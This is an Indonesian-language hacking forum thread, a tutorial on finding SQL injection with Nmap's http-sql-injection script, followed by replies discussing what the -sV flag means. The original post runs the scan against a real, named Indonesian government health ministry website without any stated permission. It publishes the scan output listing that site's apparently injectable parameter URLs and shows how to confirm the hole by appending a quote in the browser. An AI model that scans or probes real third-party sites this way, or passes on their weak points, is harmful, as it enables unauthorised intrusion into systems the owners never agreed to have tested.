Scan vuln sql injection with NMAP

by teh - 03-09-2016 at 11:47 PM
Junior Member
Posts:
32
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-09-2016, 11:47 PM (This post was last modified: 03-10-2016, 08:14 AM by teh.)
saya mau sharing tentang mencari celah sql injection dengan script yang ada di NMAP. maaf bila ada kesalahan mohon di koreksi mastah :blush: 
command line yang saya gunakan 
Code:
nmap -sV --script=http-sql-injection www.target.com -Pn -p 80

keterangan :
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan

disini saya akan test situs http://www.depkes.go.id

Code:
tehmanis@0dayWL:~$ nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST
Nmap scan report for www.depkes.go.id (202.70.136.4)
Host is up (0.026s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((Oracle))
|_http-server-header: Apache/2.2.15 (Oracle)
| http-sql-injection:
|   Possible sqli for queries:
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|_    http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.95 seconds

nah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :

Code:
http://www.depkes.go.id/index.php?lg=LN01

tambahkan kutip pada akhir alamat url, dan ini hasil nya.

[Image: 10qb7e1.jpg]


ini saya buat video nya juga cekidoot
semoga bermanfaat dan mohon maaf bilang banyak salah dalam thread ini :blush:
Reply
Find Posts
From Nothing To Be Something
Moderators
Posts:
49
Joined:
Mar 2016
Likes:
0
Reputation:
0
Staff Member
2 Year Of Member
#2
Posted: 03-10-2016, 12:56 AM
wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah
Reply
Find Posts
Junior Member
Posts:
32
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#3
OP
Posted: 03-10-2016, 07:37 AM
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
Reply
Find Posts
Satpam
Administrators
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
Admin
2 Year Of Member
#4
Posted: 03-10-2016, 08:06 AM
Mantab,mas..
Ijin coba dulu dah..
Reply
Find Posts
From Nothing To Be Something
Moderators
Posts:
49
Joined:
Mar 2016
Likes:
0
Reputation:
0
Staff Member
2 Year Of Member
#5
Posted: 03-10-2016, 11:04 AM
(03-10-2016, 07:37 AM)teh Wrote:
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D

tapi mgkin ane yang salah :3
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah
Reply
Find Posts
Junior Member
Posts:
8
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#6
Posted: 03-10-2016, 11:28 AM
Lumayan ilmu nya om..
Reply
Find Posts
Junior Member
Posts:
32
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#7
OP
Posted: 03-10-2016, 02:42 PM
(03-10-2016, 11:04 AM)Aiden_ Wrote:
(03-10-2016, 07:37 AM)teh Wrote:
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D

tapi mgkin ane yang salah :3
wah mkasih lg om :D  klo dari nmap --help fungsi -sV scanning fungsi ke database nya yaa kaya contoh di atas muncul versi DB oracle
Reply
Find Posts
From Nothing To Be Something
Moderators
Posts:
49
Joined:
Mar 2016
Likes:
0
Reputation:
0
Staff Member
2 Year Of Member
#8
Posted: 03-11-2016, 12:28 AM (This post was last modified: 03-11-2016, 12:34 AM by Aiden_.)
(03-10-2016, 02:42 PM)teh Wrote:
(03-10-2016, 11:04 AM)Aiden_ Wrote:
(03-10-2016, 07:37 AM)teh Wrote:
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D

tapi mgkin ane yang salah :3
wah mkasih lg om :D  klo dari nmap --help fungsi -sV scanning fungsi ke database nya yaa kaya contoh di atas muncul versi DB oracle
yaa emg bener, kan itu nama service nya apache, jadi itu di discloure versi dari service apache nya
coba kalau ente punya server, ente disable semua service yang berjalan pada port2 yang ingin di scan
kira versi nya akan keluar apa kagak :D
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah
Reply
Find Posts
Junior Member
Posts:
32
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#9
OP
Posted: 03-11-2016, 01:22 PM
hmm gitu yaa proses nya mkasih kang aiden nambah ilmu lg nih saya :D
Reply
Find Posts
Security Analyze
Super Moderators
Posts:
35
Joined:
Mar 2016
Likes:
1
Reputation:
0
Staff Member
2 Year Of Member
#10
Posted: 03-11-2016, 02:03 PM
wiiihh mantap
Zero-Security.id | BackBox Jakarta Team
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)